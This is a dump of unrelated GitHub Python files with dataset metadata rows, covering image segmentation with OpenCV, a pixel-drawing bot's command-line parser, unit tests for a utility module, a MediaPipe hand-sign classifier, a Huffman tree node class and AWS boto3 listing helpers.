ler_arquivo()
contar_itens()
#tt = []
#tt.append('2327')
#consultar_imagem(tt)
| marcelocaon/gerador_catalogo_produtos | main.py | main.py | py | 9,572 | python | pt | code | 1 | github-code | 36 |
536521380 | import os
import cv2
import numpy as np
import skimage.exposure as sk_exposure
import matplotlib.pyplot as plt
from skimage.io import imshow, imread
from skimage.color import rgb2hsv, hsv2rgb
from skimage import color
from scipy.ndimage.filters import maximum_filter
from scipy.ndimage.morphology import generate_binary_structure, binary_erosion
low=40
high=60
kernel = np.ones((4,4), np.uint8)
path_image_contour= 'C:/Users/Laura/AppData/Local/Programs/Python/Python36/Phenotype/Paint/001'
FILENAME='C:/Users/Laura/AppData/Local/Programs/Python/Python36/Phenotype/Images/006/TCGA-001-tile-r12-c5-x4096-y11264-w1024-h1024.PNG' #image can be in gif jpeg or png format
path_image_final = 'C:/Users/Laura/AppData/Local/Programs/Python/Python36/Phenotype/Images/Image_seg'
import matplotlib.pyplot as plt
import matplotlib.image as mpimg
#img=cv2.imread(FILENAME)
#imgplot = plt.imshow(img)
#plt.show()
kernel_dil = np.ones((3,3), np.uint8)
#def contour_img (path_image_contour) :
list_img = os.listdir(path_image_contour)
for annot_num, annotation_tif in (enumerate(list_img)):
imagepath =path_image_contour+'/'+ annotation_tif
print(annotation_tif)
img = cv2.imread(imagepath,1)
p= os.path.basename(annotation_tif)
name1 = os.path.splitext(p)[0]
fname = name1 + '.png'
path_image_final_1 = os.path.join(path_image_final,fname)
img= cv2.resize(img, (364,364), interpolation = cv2.INTER_AREA)
cv2.imshow('',img)
cv2.waitKey(0)
img = cv2.erode(img, kernel_dil, iterations=1)
img_hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)
img_fin = np.zeros(img.shape, dtype=np.uint8)
# img_hsv = cv2.dilate(img_hsv, kernel, iterations=1)
lower_mask = img_hsv [:,:,0] > 90
upper_mask = img_hsv [:,:,0] < 130
saturation = img_hsv [:,:,1] > 100
mask = upper_mask*lower_mask *saturation
red = img[:,:,0]*mask
green = img[:,:,1]*mask
blue = img[:,:,2]*mask
red_girl_masked = np.dstack((red,green,blue))
red_girl_masked = cv2.cvtColor(red_girl_masked, cv2.COLOR_BGR2GRAY)
cv2.imshow('',red_girl_masked)
cv2.waitKey(0)
ret,threshNuclei = cv2.threshold(red_girl_masked,0,255,cv2.THRESH_BINARY)
contoursNuclei, hierarchy = cv2.findContours(threshNuclei,cv2.RETR_TREE ,cv2.CHAIN_APPROX_SIMPLE)
# cv2.drawContours(img ,contoursNuclei, -1, (0,255,0), 1)
# cv2.imshow('',img)
# cv2.waitKey(0)
for c in zip(contoursNuclei, hierarchy[0]):
if cv2.contourArea(c[0]) > 200:
if c[1][3] != -1:
temp = np.zeros(img.shape, dtype=np.uint8)
cv2.fillPoly(temp, pts=[c[0]], color=(255, 255, 255))
# cv2.imshow('',temp)
# cv2.waitKey(0)
masked_image = cv2.bitwise_and(img, temp)
Mask_black = cv2.bitwise_not(masked_image)
mask_ = cv2.bitwise_not(temp)
masked_image_ = cv2.bitwise_or(masked_image, mask_)
temp_1 = cv2.cvtColor(temp, cv2.COLOR_BGR2GRAY )
#image_max = ndi.maximum_filter(masked_image_, size=20, mode='constant')
dst = cv2.cornerHarris(temp_1,12,13,0.20)
dst = cv2.dilate(dst,None)
masked_image_shape = (masked_image_[dst>0.01*dst.max()]).shape
masked_image_[dst>0.01*dst.max()]=[0,0,255]
# cv2.imshow('dst',masked_image_)
# cv2.waitKey(0)
print( masked_image_shape[0])
if masked_image_shape[0]< 290:
img_fin = img_fin+temp
elif len(masked_image_[dst>0.09*dst.max()])<210:
img_fin = img_fin+temp
# cv2.imshow('',img_fin)
# cv2.waitKey(0)
cv2.imwrite(path_image_final_1, img_fin)
cv2.imshow('',img_fin)
cv2.waitKey(0)
# cv2.drawContours(img ,contoursNuclei, -1, (0,255,0), 1)
| LauraMarin/Tesis_2023 | Unet_Nuclei_feature/Contour_seg.py | Contour_seg.py | py | 4,106 | python | en | code | 0 | github-code | 36 |
36109925973 | #!/usr/bin/env python3
#_main_.py
import writer
import getimage
import argparse
import os
from time import sleep
import gimmedahandler #import shit
##set up the parser
parser = argparse.ArgumentParser(
description= "A simple bot to place pixels from a picture to whatever you want \n Please note to write files with their according filetypes",
epilog= "Have fun with my Bot",
prefix_chars="-/",
add_help=False
)
# add arguments to the parser
parser.add_argument("-?", "--help", action="help", help="Show this help message")
parser.add_argument("--User_Interface", "-ui", action="store_true", dest="UI", help="Wether or not you will use the built-in User Interface. If given, will ignore all other parameters.")
# CLI flag declarations followed by dispatch into either the interactive UI
# or the fully scripted drawing pipeline.
# BUGFIX: "-s" was passed twice to the same add_argument call, which makes
# argparse raise ArgumentError ("conflicting option string") at startup.
parser.add_argument("-s", "--silence", action="store_true", dest="silence", help="If this parameter is given, the Program will not output anyting (exept fatal errors)")
parser.add_argument("-nc", "--no_colors", action="store_true", dest="nc", help="Wether to not use custom text coloring(e.g. if the output is saved to a file)")
parser.add_argument("-p", "--picture", type=str, dest="inpath", action="store", help="The path of the picture you want the Bot to draw.")
parser.add_argument("-h", "--handler", type=str, dest="handler", action="store", help="The file name of the handler that the Bot will use to draw your image.")
parser.add_argument("-sx", "--startx", type=int, dest="startx", action="store", help="The x coordinate of the top left corner of the canvas \n that the bot will draw your image into")
parser.add_argument("-sy", "--starty", type=int, dest="starty", action="store", help="The y coordinate of the top left corner of the canvas \n that the bot will draw your image into")
parser.add_argument("-ex", "--endx", type=int, dest="endx", action="store", help="The x coordinate of the bottom right corner of the canvas \n that the bot will draw your image into")
parser.add_argument("-ey", "--endy", type=int, dest="endy", action="store", help="The y coordinate of the bottom right corner of the canvas \n that the bot will draw your image into")
args = parser.parse_args() #parse the given arguments
#print("hehe", flush=True)
if args.UI and args.silence:
    # A silenced UI is unusable; idle forever instead of doing anything.
    while True:
        sleep(1)
    #how you gonna use a invisible UI???
if args.nc: #creating a temporary file so that the toolset module knows wether or not to use custom colouring
    f = open("nc.temp", "x")
    f.close()
if args.UI == False and args.inpath == None and args.handler == None and args.startx == None and args.starty == None:
    parser.parse_args(["-?"]) #return the help page if no args are given
#print(args.handler)
if args.UI:
    image, size = getimage.imageprompt(args.UI) #getting the image stuff
    handler = gimmedahandler.gethandler(args.handler, args.UI) #retriveving the handler
    #print(handler)
    startx, starty, endx, endy = writer.getcanvas(args.UI, args.startx, args.starty, args.endx, args.endy) # retrieving the info about the canvas coordinates from the user
    writer.write(image, handler, startx, starty, endx, endy, size, args.UI, args.silence) #giving shit to the writing algorithms
    if args.nc: #removing the temporary file
        os.remove("./nc.temp")
else:
    handler = gimmedahandler.gethandler(args.handler, args.UI) #prepping handler
    image, size = getimage.imageprompt(args.UI, args.inpath) #prepping the given img
    startx, starty, endx, endy = writer.getcanvas(args.UI, args.startx, args.starty, args.endx, args.endy) #checking the coords
    writer.write(image, handler, startx, starty, endx, endy ,size, args.UI, args.silence) #writing the image to the canvas
    if args.nc: #removing the temporary file
        os.remove("./nc.temp")
| a-usr/pixelbot | _main_.py | _main_.py | py | 3,718 | python | en | code | 1 | github-code | 36 |
33147644172 | #!/usr/bin/env python3
# Class for parsing arguments
# from command line
# Allowed arguments are
# --help
# --source=file
# --source="file"
# --input=file
# --input="file"
import sys
import re
class ArgumentsParser:
    """
    Parses command-line arguments into a dict and returns it.

    Recognised forms:
      --name=value  -> {"--name": "value"}
      --help        -> {"--help": None}
    Any other argument is silently ignored.
    """
    @staticmethod
    def parse():
        """Return a dict mapping option names to their values (None for --help)."""
        args = {}
        for argument in sys.argv[1:]:
            # Search for --something=file pattern
            if re.search("^--[a-zA-Z]*=.+$", argument):
                # Split only on the FIRST '=' so values that themselves
                # contain '=' (e.g. --source=a=b) are kept intact; the
                # original unbounded split truncated such values.
                splitedArg = argument.split("=", 1)
                args[splitedArg[0]] = splitedArg[1]
            elif argument == '--help':
                args[argument] = None
        return args
| hondem/FIT | ipp_proj_1/arguments_parser.py | arguments_parser.py | py | 595 | python | en | code | 0 | github-code | 36 |
def purchases(n):
    """Return the shipping charge: 10.95 for the first order, 2.95 per extra order."""
    if n == 1:
        return 10.95
    return 10.95 + (n - 1) * 2.95
# Prompt for the order count and print the shipping charge; 0 is rejected.
n=int(input("Enter number of orders:"))
if n!=0:
    amount=purchases(n)
    print("Shipping charges=",amount)
else:
    print("Invalid input")
| rohanxd1/Codes | Python/Internship/program9.py | program9.py | py | 264 | python | en | code | 0 | github-code | 36 |
17697981558 | import os
import sys
from time import time, sleep
from itertools import permutations
import pickle
import matplotlib.pyplot as plt
import cv2
import numpy as np
import pandas as pd
import mediapipe as mp
from sklearn.tree import DecisionTreeClassifier
from PIL import Image, ImageDraw, ImageFont
from torch import positive
def pil2cv(imgPIL):
imgCV_RGB = np.array(imgPIL, dtype = np.uint8)
imgCV_BGR = np.array(imgPIL)[:, :, ::-1]
return imgCV_BGR
def cv2pil(imgCV):
imgCV_RGB = imgCV[:, :, ::-1]
imgPIL = Image.fromarray(imgCV_RGB)
return imgPIL
def calc_deg(df, n1, n2, n3):
vec_a = df[[n1+'x', n1+'y']].values - df[[n2+'x', n2+'y']].values
vec_b = df[[n2+'x', n2+'y']].values - df[[n3+'x', n3+'y']].values
degs = []
for a, b in zip(vec_a, vec_b):
length_vec_a = np.linalg.norm(a)
length_vec_b = np.linalg.norm(b)
inner_product = np.inner(a, b)
cos = inner_product / (length_vec_a * length_vec_b)
rad = np.arccos(cos)
deg = np.rad2deg(rad)
degs.append(deg)
return np.radians(np.array(degs))
def preprocessing(df, n1, n2, n3, n4, feature=[]):
out = pd.DataFrame()
# 角度補正
rad = np.arctan2(df['9y'], df['9x'])
if not feature or 'rad' in feature: out['rad'] = rad
r = np.array([[np.cos(rad), -np.sin(rad)], [np.sin(rad), np.cos(rad)]])[:,:,0]
for j in range(21):
df[[str(j)+'x', str(j)+'y']] = df[[str(j)+'x', str(j)+'y']] @ r
# 極座標 r, θ
x = df[[n1+'x', n2+'x', n3+'x', n4+'x']].values
y = df[[n1+'y', n2+'y', n3+'y', n4+'y']].values
x = np.cumsum(x, axis=1)
y = np.cumsum(y, axis=1)
r = np.sqrt(x**2+y**2)
theta = np.arctan2(y, x)
if not feature or 'theta1' in feature: out['theta1'] = theta[:, 1] - theta[:, 0]
if not feature or 'theta2' in feature: out['theta2'] = theta[:, 2] - theta[:, 1]
if not feature or 'theta3' in feature: out['theta3'] = theta[:, 3] - theta[:, 2]
if not feature or 'r1' in feature: out['r1'] = r[:, 1] - r[:, 0]
if not feature or 'r2' in feature: out['r2'] = r[:, 2] - r[:, 1]
if not feature or 'r3' in feature: out['r3'] = r[:, 3] - r[:, 2]
for p in permutations([n1, n2, n3, n4], 3):
if not feature or 'a'+''.join(p) in feature: out['a'+''.join(p)] = calc_deg(df, p[0], p[1], p[2])
# 2点間の角度
if not feature or 'd'+n1 in feature: out['d'+n1] = np.degrees(np.arctan2(df[n1+'y'], df[n1+'x']))
if not feature or 'd'+n2 in feature: out['d'+n2] = np.degrees(np.arctan2(df[n2+'y']-df[n1+'y'], df[n2+'y']-df[n1+'x']))
if not feature or 'd'+n3 in feature: out['d'+n3] = np.degrees(np.arctan2(df[n3+'y']-df[n2+'y'], df[n3+'y']-df[n2+'x']))
if not feature or 'd'+n4 in feature: out['d'+n4] = np.degrees(np.arctan2(df[n4+'y']-df[n3+'y'], df[n4+'y']-df[n3+'x']))
if not feature or 'd'+n1+n3 in feature: out['d'+n1+n3] = np.degrees(np.arctan2(df[n3+'y']-df[n1+'y'], df[n3+'y']-df[n1+'x']))
if not feature or 'd'+n2+n4 in feature: out['d'+n2+n4] = np.degrees(np.arctan2(df[n4+'y']-df[n2+'y'], df[n4+'y']-df[n2+'x']))
if not feature or 'd'+n1+n4 in feature: out['d'+n1+n4] = np.degrees(np.arctan2(df[n4+'y']-df[n1+'y'], df[n4+'y']-df[n1+'x']))
# under is n4
if not feature or 'under is '+n4 in feature: out['under is '+n4] = (np.argmin(df[[n1+'y', n2+'y', n3+'y', n4+'y']].values, axis=1)) == 3
# top is n4
if not feature or 'top is '+n4 in feature: out['top is '+n4] = (np.argmax(df[[n1+'y', n2+'y', n3+'y', n4+'y']].values, axis=1)) == 3
# n1 vs n3
if not feature or n1+' vs '+n3 in feature: out[n1 + ' vs ' + n3] = df[n1+'y'] < df[n3+'y']
# dist 0 n1
if not feature or '0_'+n1 in feature: out[f'0_{n1}'] = np.sqrt((df['0x']-df[n1+'x'])**2 + (df['0y']-df[n1+'y'])**2 + 1e-10)
# dist 0 n2
if not feature or '0_'+n2 in feature: out[f'0_{n2}'] = np.sqrt((df['0x']-df[n2+'x'])**2 + (df['0y']-df[n2+'y'])**2 + 1e-10)
# dist 0 n3
if not feature or '0_'+n3 in feature: out[f'0_{n3}'] = np.sqrt((df['0x']-df[n3+'x'])**2 + (df['0y']-df[n3+'y'])**2 + 1e-10)
# dist 0 n4
if not feature or '0_'+n4 in feature: out[f'0_{n4}'] = np.sqrt((df['0x']-df[n4+'x'])**2 + (df['0y']-df[n4+'y'])**2 + 1e-10)
return out
import joblib
class BackEnd(object):
def __init__(self):
self.mp_pose = mp.solutions.pose
self.mp_holistic = mp.solutions.holistic
self.holistic = self.mp_holistic.Holistic(
min_detection_confidence=0.5,
min_tracking_confidence=0.5,
)
self.mp_drawing = mp.solutions.drawing_utils
self.a_dtree = joblib.load(os.path.join('weight', 'a.tree'))
self.b_dtree = joblib.load(os.path.join('weight', 'b.tree'))
self.c_dtree = joblib.load(os.path.join('weight', 'c.tree'))
def detection(self, pos):
start = time()
df = self.norm_mp_pos(pos)
features = ['r3', 'a171819', 'a171920', 'a182017', 'a182019', 'a201918', 'd1720']
df_ = preprocessing(df, '17', '18', '19', '20', features)
self.a_dtree.n_features_ = len(features)
prev = self.a_dtree.predict(df_)
ans = '未検出'
if prev == 1: ans = 'い'; print('i')
elif prev == 0:
features = ['0_12']
df_ = preprocessing(df, '8', '12', '16', '20', features)
self.b_dtree.n_features_ = len(features)
prev = self.b_dtree.predict(df_)
if prev == 0: ans = 'あ'
else: ans = 'う'
else:
features = ['theta2', 'a3124', 'a4312', 'a8124', 'd12']
df_ = preprocessing(df, '3', '4', '8', '12', features)
self.c_dtree.n_features_ = len(features)
prev = self.c_dtree.predict(df_)
if prev == 0: ans = 'え'
else: ans = 'お'
return ans
def main(self, image):
results = self.holistic.process(image)
self.mp_drawing.draw_landmarks(image, results.left_hand_landmarks, self.mp_holistic.HAND_CONNECTIONS)
self.mp_drawing.draw_landmarks(image, results.right_hand_landmarks, self.mp_holistic.HAND_CONNECTIONS)
right_pos = results.right_hand_landmarks
left_pos = results.left_hand_landmarks
right_ans = left_ans = '未検出'
if not right_pos is None: right_ans = self.detection(list(right_pos.landmark))
if not left_pos is None: left_ans = self.detection(list(left_pos.landmark))
h, w, _ = image.shape
print(h, w)
image = cv2pil(image)
draw = ImageDraw.Draw(image)
draw.text((0, 0), right_ans, (255,255,255), font=ImageFont.truetype('C:/Windows/Fonts/msgothic.ttc', 30))
draw.text((w-100, 0), left_ans, (255,255,255), font=ImageFont.truetype('C:/Windows/Fonts/msgothic.ttc', 30))
image = pil2cv(image)
return image
def norm_mp_pos(self, pos):
d = []
base_x = base_y = 0
for i in range(21):
if i == 0:
base_y = pos[i].y
base_x = pos[i].x
x = pos[i].x-base_x
y = pos[i].y-base_y
d.append(x)
d.append(y)
s = []
for i in range(21):
s.append(str(i)+'x')
s.append(str(i)+'y')
df = pd.DataFrame([d], columns=s)
#row_df = df.copy()
# 角度補正
y = df['9y'].values
x = df['9x'].values
rad = np.arctan2(y, x)
df['rad'] = rad
r = np.array([[np.cos(rad), -np.sin(rad)], [np.sin(rad), np.cos(rad)]])
r = r.reshape((2, 2))
for j in range(21):
df[[str(j)+'x', str(j)+'y']] = df[[str(j)+'x', str(j)+'y']] @ r
return df
class FrontEnd(object):
def __init__(self):
self.backend = BackEnd()
def main(self, cap):
while True:
start = time()
if cv2.waitKey(1) & 0xFF == ord('q'): break
ret, image = cap.read()
if not ret: continue
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
image = self.backend.main(image)
print(time()-start)
cv2.imshow('frame', cv2.cvtColor(image, cv2.COLOR_BGR2RGB))
cv2.destroyAllWindows()
if __name__ == '__main__':
capture = cv2.VideoCapture(0)
FrontEnd().main(capture)
capture.release()
#cv2.destroyAllWindows()
| fukumoto1998/fingerspelling | word5/main.py | main.py | py | 8,588 | python | en | code | 0 | github-code | 36 |
27775098322 | import matplotlib.pyplot as plt
import numpy as np
# Create some data to plot
x = np.arange(5)
y = [2, 5, 3, 8, 10]
# Set the xticks with labels that include LaTeX and \n
xticks = [r'Label 1', r'Label$_{2}\n$with superscript $x^2$', r'Label 3', r'Label$_{4}$', r'Label 5']
plt.plot(x, y)
plt.xticks(x, xticks, rotation=0)
# Enable LaTeX rendering
plt.rc('text', usetex=True)
# Show the plot
plt.show()
| JinyangLi01/Query_refinement | Experiment/TPCH/running_time/try.py | try.py | py | 406 | python | en | code | 0 | github-code | 36 |
42733088110 | class Leaf(object):
def __init__(self, is_root=False, weight=0, char=None, parent=None, left_child=None, right_child=None):
self.is_root = is_root
self.weight = weight
self.char = char
self.parent = parent
self.left_child = left_child
self.right_child = right_child
def __str__(self):
return "Leaf {0}: is_root={1}, weight={2}, char={3}, parent={4}, left_child={5}, right_child={6}".format(
self.char, self.is_root, self.weight, self.char, bool(self.parent), bool(self.left_child), bool(self.right_child)
)
| magservel/Huffman-Vitter | Leaf.py | Leaf.py | py | 598 | python | en | code | 0 | github-code | 36 |
29524986199 | import os
import tempfile
import time
import unittest
from Tools import ValkyrieTools
class TestTools(unittest.TestCase):
    """Unit tests for the Tools.ValkyrieTools helper module.

    Each test pins the exact value (including hard-coded digests) expected
    from the corresponding ValkyrieTools function.
    """
    def test_isFloat(self):
        self.assertTrue(ValkyrieTools.isFloat('1.0'))
        self.assertFalse(ValkyrieTools.isFloat(1))
    def test_isInteger(self):
        self.assertTrue(ValkyrieTools.isInteger(1))
        self.assertFalse(ValkyrieTools.isInteger(1.3))
    def test_isBoolean(self):
        # Accepts textual booleans (True/False/Yes/No, any case) and 0/1 ints,
        # but not the strings "0"/"1".
        self.assertTrue(ValkyrieTools.isBoolean('True'))
        self.assertTrue(ValkyrieTools.isBoolean('False'))
        self.assertTrue(ValkyrieTools.isBoolean('Yes'))
        self.assertTrue(ValkyrieTools.isBoolean('No'))
        self.assertFalse(ValkyrieTools.isBoolean('1'))
        self.assertFalse(ValkyrieTools.isBoolean('0'))
        self.assertTrue(ValkyrieTools.isBoolean(1))
        self.assertTrue(ValkyrieTools.isBoolean(0))
        self.assertFalse(ValkyrieTools.isBoolean('Maybe'))
    def test_isList(self):
        self.assertTrue(ValkyrieTools.isList([1, 2, 3]))
        self.assertFalse(ValkyrieTools.isList({'a': 1, 'b': 2}))
    def test_isDict(self):
        self.assertTrue(ValkyrieTools.isDict({'a': 1, 'b': 2}))
        self.assertFalse(ValkyrieTools.isDict([1, 2, 3]))
    def test_isJson(self):
        self.assertTrue(ValkyrieTools.isJson('{"key": "value"}'))
        self.assertFalse(ValkyrieTools.isJson('invalid_json'))
    def test_matchDict(self):
        # matchDict should coerce every string value to its natural type.
        test_dict = {
            "a": "1", "b": "2", "c": "3", "d": "True", "e": "false", "f": "Yes", "g": "NO",
            "h": "1.3", "i": "1.0", "j": "5", "k": "Maybe", "l": "[1, 2, 3]", "m": "{'a': 1, 'b': 2}"
        }
        expected_result = {'a': 1, 'b': 2, 'c': 3, 'd': True, 'e': False, 'f': True, 'g': False,
                           'h': 1.3, 'i': 1.0, 'j': 5, 'k': 'Maybe', 'l': [1, 2, 3], 'm': {'a': 1, 'b': 2}}
        self.assertEqual(ValkyrieTools.matchDict(test_dict), expected_result)
    def test_formatSize(self):
        self.assertEqual(ValkyrieTools.formatSize(1000000000), '1.00 GB')
        self.assertEqual(ValkyrieTools.formatSize(1000000), '1.00 MB')
        self.assertEqual(ValkyrieTools.formatSize(1000), '1.00 KB')
        self.assertEqual(ValkyrieTools.formatSize(500), '500.00 B')
    def test_formatSpeed(self):
        self.assertEqual(ValkyrieTools.formatSpeed(1000000), '1.00 MB/s')
        self.assertEqual(ValkyrieTools.formatSpeed(1000), '1.00 KB/s')
        self.assertEqual(ValkyrieTools.formatSpeed(500), '500.00 B/s')
    def test_formatTime(self):
        self.assertEqual(ValkyrieTools.formatTime(1000000), '11.57 days')
        self.assertEqual(ValkyrieTools.formatTime(3600), '1.00 hours')
        self.assertEqual(ValkyrieTools.formatTime(120), '2.00 minutes')
        self.assertEqual(ValkyrieTools.formatTime(30), '30.00 seconds')
    def test_formatNumber(self):
        self.assertEqual(ValkyrieTools.formatNumber(1234567.89), '1,234,567.89')
    def test_generateHwid(self):
        # As this function generates a unique hardware ID, it's difficult to test for a specific result.
        # You can verify that it returns a non-empty string, for example.
        hwid = ValkyrieTools.generateHwid()
        self.assertTrue(hwid)
    def test_generateCode(self):
        code_length = 32
        generated_code = ValkyrieTools.generateCode(code_length)
        self.assertEqual(len(generated_code), code_length)
    def test_markdownHtml(self):
        markdown_text = '**Hello** *World*!'
        expected_html = '<b>Hello</b> <i>World</i>!'
        self.assertEqual(ValkyrieTools.markdownHtml(markdown_text), expected_html)
    def test_getHash(self):
        # Digests below were produced once from this fixed input.
        data = b'This is some data to hash'
        expected_md5_hash = 'fbe8ee5bbfd9ec0c6f1949ba2ac9e0d7'
        expected_sha1_hash = '6acc0ca14c9cd14671c1034a36396066c00ad053'
        expected_sha256_hash = '09b0d6cdcb1dc978740a4510cfbce9308423817d78447a7345bafc2950c8ff7b'
        expected_sha512_hash = '6b0e3ed391e918823f5faf249c3e077ad9f5681d1d9b6c19f4e669caae3d8abefbf0bb9d443150ab62632e69554d0d22ae6be9c70334005ba0566bd6c2eff822'
        self.assertEqual(ValkyrieTools.getHash(data, 'md5'), expected_md5_hash)
        self.assertEqual(ValkyrieTools.getHash(data, 'sha1'), expected_sha1_hash)
        self.assertEqual(ValkyrieTools.getHash(data, 'sha256'), expected_sha256_hash)
        self.assertEqual(ValkyrieTools.getHash(data, 'sha512'), expected_sha512_hash)
    def test_getFileHash(self):
        # NOTE(review): delete=False and the file is never removed afterwards,
        # so each run leaves a temp file behind — consider cleaning up.
        file_content = "This is the file content."
        temp_path = tempfile.gettempdir()
        temp_file = tempfile.NamedTemporaryFile(dir=temp_path, delete=False)
        temp_file.write(file_content.encode('utf-8'))
        temp_file.close()
        expected_md5_hash = '066f587e2cff2588e117fc51a522c47e'
        expected_sha1_hash = '7a2dc28ce65f9b346523bd0e2f177d3b7357aba1'
        expected_sha256_hash = 'dc9dbf28907435fb339baac4eb2b386538570c20ba1fcd3373f9c24d95a84ff4'
        expected_sha512_hash = 'b345bc4c99404c161d67793aa412d8120a9831cfa4f307a8e8b8b290530665b17675106f5d6eebfdc0a82e43d2d4207a6485d5ff8d8dc124d0e20681d150a609'
        self.assertEqual(ValkyrieTools.getFileHash(temp_file.name, 'md5'), expected_md5_hash)
        self.assertEqual(ValkyrieTools.getFileHash(tem_file_name := temp_file.name, 'sha1'), expected_sha1_hash) if False else None
        self.assertEqual(ValkyrieTools.getFileHash(temp_file.name, 'sha1'), expected_sha1_hash)
        self.assertEqual(ValkyrieTools.getFileHash(temp_file.name, 'sha256'), expected_sha256_hash)
        self.assertEqual(ValkyrieTools.getFileHash(temp_file.name, 'sha512'), expected_sha512_hash)
    def test_getFileData(self):
        file_content = b'This is the file content.'
        with tempfile.NamedTemporaryFile(delete=False) as temp_file:
            temp_file.write(file_content)
            temp_file_path = temp_file.name
        self.assertEqual(ValkyrieTools.getFileData(temp_file_path), file_content)
    def test_getFileSize(self):
        file_content = b'This is the file content.'
        with tempfile.NamedTemporaryFile(delete=False) as temp_file:
            temp_file.write(file_content)
            temp_file_path = temp_file.name
        expected_file_size = len(file_content)
        self.assertEqual(ValkyrieTools.getFileSize(temp_file_path), expected_file_size)
    def test_getFileEdit(self):
        with tempfile.NamedTemporaryFile(delete=False) as temp_file:
            temp_file_path = temp_file.name
        time.sleep(1)
        expected_edit_time = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(os.path.getmtime(temp_file_path)))
        self.assertEqual(ValkyrieTools.getFileEdit(temp_file_path), expected_edit_time)
    def test_getFileList(self):
        # getFileList is expected to return forward-slash paths recursively.
        temp_dir = tempfile.mkdtemp()
        os.makedirs(os.path.join(temp_dir, 'subdir'))
        with tempfile.NamedTemporaryFile(dir=temp_dir) as temp_file1:
            with tempfile.NamedTemporaryFile(dir=os.path.join(temp_dir, 'subdir')) as temp_file2:
                expected_file_list = [temp_file1.name.replace("\\", "/"), temp_file2.name.replace("\\", "/")]
                self.assertEqual(ValkyrieTools.getFileList(temp_dir), expected_file_list)
# Run the suite when this file is executed directly.
if __name__ == '__main__':
    unittest.main()
| ValkyFischer/ValkyrieUtils | unittests/test_tools.py | test_tools.py | py | 7,154 | python | en | code | 0 | github-code | 36 |
2521012317 | import configparser
import html
from pathlib import Path
from pprint import pformat
from urllib.parse import urlparse
import boto3
import botocore.model
import botocore.utils
from IPython.core.display import HTML
from jinja2 import Environment, FileSystemLoader
from pygments import highlight
from pygments.formatters import Terminal256Formatter
from pygments.lexers import PythonLexer
AWS_US_REGIONS = ["us-east-1", "us-east-2", "us-west-1", "us-west-2"]
AWS_CA_REGIONS = ["ca-central-1"]
AWS_SA_REGIONS = ["sa-east-1"]
AWS_EU_REGIONS = ["eu-west-3", "eu-west-2", "eu-west-1", "eu-central-1"]
AWS_ASIA_REGIONS = [
"ap-south-1",
"ap-northeast-2",
"ap-northeast-1",
"ap-southeast-1",
"ap-southeast-2",
]
AWS_ALL_REGIONS = (
AWS_US_REGIONS
+ AWS_CA_REGIONS
+ AWS_SA_REGIONS
+ AWS_EU_REGIONS
+ AWS_ASIA_REGIONS
)
AWS_SERVICES_CONDENSED = [
"cloudfront",
"cloudtrail",
"ec2",
"s3",
"elb",
"iam",
"rds",
"route53",
"route53domains",
"sns",
"sqs",
"sts",
]
AWS_SERVICES_DATA = [
"athena",
"rds",
"dynamodb",
"elasticache",
"redshift",
"neptune",
"dms",
]
AWS_SERVICES_COMPUTE = ["ec2", "lambda", "stepfunctions"]
AWS_SERVICES_OPS = ["cloudformation", "opsworks", "opsworkscm", "ssm"]
AWS_SERVICES_MGMT = [
"cloudtrail",
"cloudwatch",
"budgets",
"config",
"cur",
"events",
"iam",
"logs",
"organizations",
"pricing",
"servicecatalog",
"ssm",
"sts",
]
def list_profile_names(profile_exclusions=None, keyword_exclusions=None):
    """Return AWS profile names found in ~/.aws/config.

    Profiles named in ``profile_exclusions``, or containing any substring
    listed in ``keyword_exclusions``, are filtered out.
    """
    # None sentinels instead of mutable default arguments; call sites are
    # unaffected and the default behavior is identical.
    if profile_exclusions is None:
        profile_exclusions = []
    if keyword_exclusions is None:
        keyword_exclusions = []
    config = configparser.ConfigParser()
    config.read(Path("~/", ".aws", "config").expanduser())
    # Sections look like "profile NAME"; strip the prefix.
    profile_names = [
        section.replace("profile ", "") for section in config.sections()
    ]
    exclude = set(profile_exclusions) | {
        x for x in profile_names for kw in keyword_exclusions if kw in x
    }
    return [x for x in profile_names if x not in exclude]
def list_regions():
    """Return all region names reported by EC2 ``describe_regions``.

    Uses the first configured profile; requires network access to AWS.
    """
    sess = boto3.session.Session(profile_name=list_profile_names()[0])
    ec2 = sess.client("ec2", "us-east-1")
    regions = ec2.describe_regions().get("Regions")
    return [region.get("RegionName") for region in regions]
def list_services_for_region(region):
    """Return the boto3 service names available in ``region``."""
    sess = boto3.session.Session(
        profile_name=list_profile_names()[0], region_name=region
    )
    return sess.get_available_services()
def pprint_color(obj):
    # Pretty-print any object with 256-color Python syntax highlighting.
    print(highlight(pformat(obj), PythonLexer(), Terminal256Formatter()))
def render_template(template_file, **kwargs):
    """Render the Jinja2 template ``template_file`` (relative to CWD) with ``kwargs``."""
    templateLoader = FileSystemLoader(searchpath="./")
    templateEnv = Environment(loader=templateLoader)
    template = templateEnv.get_template(template_file)
    outputText = template.render(**kwargs)
    return outputText
def get_shape_data(client, shape_for):
    """Recursively describe a botocore shape as plain dicts.

    Strings yield their enum/docs, structures recurse into their members,
    lists descend into the element shape, and maps/base shapes collapse to
    a small summary dict.
    """
    shape = client.meta.service_model.shape_for(shape_for)
    # Dispatch table keyed on the exact shape class; unknown classes fall
    # through to an empty dict via the .get(...) default below.
    shape_return = {
        botocore.model.StringShape: lambda x: dict(
            enum=x.enum, docs=x.documentation
        ),
        botocore.model.StructureShape: lambda x: dict(
            name=x.name,
            required=x.required_members,
            members={
                k: get_shape_data(client, v.name) for k, v in x.members.items()
            },
            docs=x.documentation,
        ),
        botocore.model.ListShape: lambda x: get_shape_data(
            client, x.member.name
        ),
        botocore.model.MapShape: lambda x: dict(
            type=str(type(x)), name=x.name
        ),
        botocore.model.Shape: lambda x: dict(type=x.name),
    }
    return shape_return.get(type(shape), lambda x: dict())(shape)
def generate_cloudtrail_reference(region="us-east-1", svc_include=None):
    """
    Generates a dictionary object containing a quick reference of event sources
    and event function names for every AWS service or only the services included
    in `svc_include`.
    """
    if svc_include is None:
        svc_include = []
    session = boto3.session.Session(region_name=region)
    services = session.get_available_services()
    if len(svc_include) > 0:
        # Only instantiate clients for the requested services.
        services = {
            svc_name: session.client(svc_name)
            for svc_name in services
            if svc_name in svc_include
        }
    else:
        services = {
            svc_name: session.client(svc_name)
            for svc_name in services
        }
    data = {
        svc_name: dict(
            # Strip the region from the endpoint host to get the CloudTrail
            # event source (e.g. "ec2.amazonaws.com").
            EventSource=urlparse(client.meta.endpoint_url).netloc.replace(
                f"{region}.", ""
            ),
            EventNames=client.meta.service_model.operation_names,
        )
